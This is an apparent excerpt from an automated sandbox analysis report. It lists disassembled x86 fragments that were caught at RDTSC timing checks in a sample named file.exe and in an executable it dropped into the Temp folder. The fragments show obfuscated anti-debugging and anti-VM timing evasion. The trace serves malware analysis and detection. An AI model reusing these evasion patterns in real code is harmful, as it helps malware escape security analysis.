Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545072C second address: 5450749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54508F2 second address: 54508F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54508F8 second address: 54508FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54508FC second address: 5450981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e jmp 00007F661CE75E96h 0x00000013 lea eax, dword ptr [ebp-2Ch] 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007F661CE75E8Dh 0x0000001e and cx, AC26h 0x00000023 jmp 00007F661CE75E91h 0x00000028 popfd 0x00000029 pop esi 0x0000002a mov edi, 7473A444h 0x0000002f popad 0x00000030 push ebp 0x00000031 jmp 00007F661CE75E98h 0x00000036 mov dword ptr [esp], esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F661CE75E8Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450981 second address: 5450985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450985 second address: 545098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545098B second address: 54509C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D45143Ch 0x00000008 pushfd 0x00000009 jmp 00007F661D451442h 0x0000000e or eax, 692CAA88h 0x00000014 jmp 00007F661D45143Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509C9 second address: 54509CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509CD second address: 54509D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509D3 second address: 54509E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54509E8 second address: 5450A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D451445h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A01 second address: 5450A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov di, A4DEh 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E8Fh 0x00000014 sbb ax, 018Eh 0x00000019 jmp 00007F661CE75E99h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F661CE75E8Eh 0x00000026 push eax 0x00000027 jmp 00007F661CE75E8Bh 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F661CE75E95h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A89 second address: 5450A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A8D second address: 5450A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450A93 second address: 5450ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F661D451440h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F661D451447h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450ADA second address: 5450023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F668D4C39E4h 0x0000000f xor eax, eax 0x00000011 jmp 00007F661CE4F5BAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007F661CE75E87h 0x0000002b jmp 00007F661CE75FFBh 0x00000030 call 00007F6621A6F125h 0x00000035 mov edi, edi 0x00000037 jmp 00007F661CE75E97h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov ax, dx 0x00000043 push edi 0x00000044 pop ecx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450023 second address: 5450036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450036 second address: 545003A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545003A second address: 545009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ah, 52h 0x0000000c pushfd 0x0000000d jmp 00007F661D451447h 0x00000012 adc ax, 4CDEh 0x00000017 jmp 00007F661D451449h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F661D451448h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545009B second address: 545009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545009F second address: 54500A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54500A5 second address: 54500B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54500B6 second address: 54500CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54500CE second address: 5450139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661CE75E97h 0x00000009 xor esi, 0E4851AEh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 mov ax, CE37h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 call 00007F661CE75E98h 0x0000002e pop ecx 0x0000002f mov ecx, edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450139 second address: 545013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545013F second address: 5450143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450143 second address: 545015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D451441h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545015F second address: 545016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54501BC second address: 54501FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F661D45143Ch 0x00000011 sub ecx, 2F694A38h 0x00000017 jmp 00007F661D45143Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f mov cl, B2h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54501FE second address: 5450E0F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F661CE75E8Bh 0x00000008 sbb cx, 97FEh 0x0000000d jmp 00007F661CE75E99h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 ret 0x00000017 nop 0x00000018 and bl, 00000001h 0x0000001b movzx eax, bl 0x0000001e lea esp, dword ptr [ebp-0Ch] 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 pop ebp 0x00000025 ret 0x00000026 add esp, 04h 0x00000029 jmp dword ptr [0086A41Ch+ebx*4] 0x00000030 push edi 0x00000031 call 00007F661CE9B887h 0x00000036 push ebp 0x00000037 push ebx 0x00000038 push edi 0x00000039 push esi 0x0000003a sub esp, 000001D0h 0x00000040 mov dword ptr [esp+000001B4h], 0086CB10h 0x0000004b mov dword ptr [esp+000001B0h], 000000D0h 0x00000056 mov dword ptr [esp], 00000000h 0x0000005d mov eax, dword ptr [008681DCh] 0x00000062 call eax 0x00000064 mov edi, edi 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F661CE75E99h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E0F second address: 5450E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E2B second address: 5450E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E2F second address: 5450E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E33 second address: 5450E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E39 second address: 5450E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E3F second address: 5450E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E43 second address: 5450E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E5C second address: 5450E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E60 second address: 5450E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E64 second address: 5450E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E6A second address: 5450EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov si, 147Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F661D451448h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F661D451447h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EAB second address: 5450EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EC3 second address: 5450EF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F661D451445h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EF2 second address: 5450F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600B6 second address: 54600D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600D3 second address: 54600D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600D9 second address: 54600DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600DD second address: 5460130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F661CE75E99h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F661CE75E98h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460130 second address: 5460136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460136 second address: 546013C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546013C second address: 5460140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460140 second address: 546015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F668D4AB8B0h 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F661CE75E8Eh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546015F second address: 546016E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54601A9 second address: 54601AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54601AE second address: 546021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F661D45143Eh 0x00000010 je 00007F668DA75BF4h 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007F661D45143Dh 0x0000001e or ax, 1A46h 0x00000023 jmp 00007F661D451441h 0x00000028 popfd 0x00000029 pop ecx 0x0000002a mov edi, 606B1764h 0x0000002f popad 0x00000030 cmp dword ptr [ebp+08h], 00002000h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F661D451446h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A88 second address: 5470A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A97 second address: 5470A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A9D second address: 5470AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F661CE75E96h 0x00000011 push eax 0x00000012 jmp 00007F661CE75E8Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F661CE75E96h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push ecx 0x00000021 movsx edx, cx 0x00000024 pop eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470AF3 second address: 5470B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F661D45143Bh 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B0C second address: 5470B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B10 second address: 5470B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B16 second address: 5470B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B1B second address: 5470B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, DD0Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B2F second address: 5470B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B42 second address: 5470B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F661D451443h 0x00000015 or ch, 0000003Eh 0x00000018 jmp 00007F661D451449h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B99 second address: 5470BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F661CE75E8Eh 0x00000010 je 00007F668D493683h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F661CE75E97h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470BD9 second address: 5470C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F661D451443h 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470D47 second address: 5470D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470D4B second address: 5470D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 3DE4A8 second address: 3DE4AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 3DE4AE second address: 3DE4D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F661D451443h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F661D451436h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 3DE4D2 second address: 3DE4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54D771 second address: 54D77B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CC9B second address: 54CC9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CC9F second address: 54CCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE27 second address: 54CE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE2B second address: 54CE55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 ja 00007F661D451436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE55 second address: 54CE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE5D second address: 54CE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D451449h 0x00000009 popad 0x0000000a jl 00007F661D451438h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F661D451445h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE9F second address: 54CEC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E98h 0x00000007 jnc 00007F661CE75E86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F90E second address: 54F91E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
